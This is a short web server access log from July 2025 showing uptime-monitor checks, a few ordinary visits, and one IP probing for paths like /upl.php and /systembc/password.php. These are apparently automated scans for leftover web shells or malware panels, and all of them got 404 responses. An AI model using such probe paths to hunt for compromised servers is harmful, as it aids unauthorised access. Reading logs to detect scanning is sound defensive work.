159.223.109.44 - - [02/Jul/2025:14:12:47 +0200] "\x16\x03\x01" 501 318 "-" "-"
159.223.109.44 - - [02/Jul/2025:14:12:47 +0200] "\x16\x03\x01" 501 318 "-" "-"
159.223.109.44 - - [02/Jul/2025:14:12:48 +0200] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
159.223.109.44 - - [02/Jul/2025:14:12:48 +0200] "GET /t4 HTTP/1.1" 404 307 "-" "Mozilla/5.0"
159.223.109.44 - - [02/Jul/2025:14:12:48 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
159.223.109.44 - - [02/Jul/2025:14:12:48 +0200] "GET /form.html HTTP/1.1" 404 314 "-" "curl/8.1.2"
159.223.109.44 - - [02/Jul/2025:14:12:48 +0200] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
159.223.109.44 - - [02/Jul/2025:14:12:49 +0200] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
159.223.109.44 - - [02/Jul/2025:14:12:49 +0200] "GET /systembc/password.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
159.223.109.44 - - [02/Jul/2025:14:12:49 +0200] "GET /password.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:14:12:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
204.76.203.219 - - [02/Jul/2025:14:13:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [02/Jul/2025:14:13:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:14:14:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:14:15:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.156.156.96 - - [02/Jul/2025:14:16:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
212.91.247.32 - - [02/Jul/2025:14:16:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
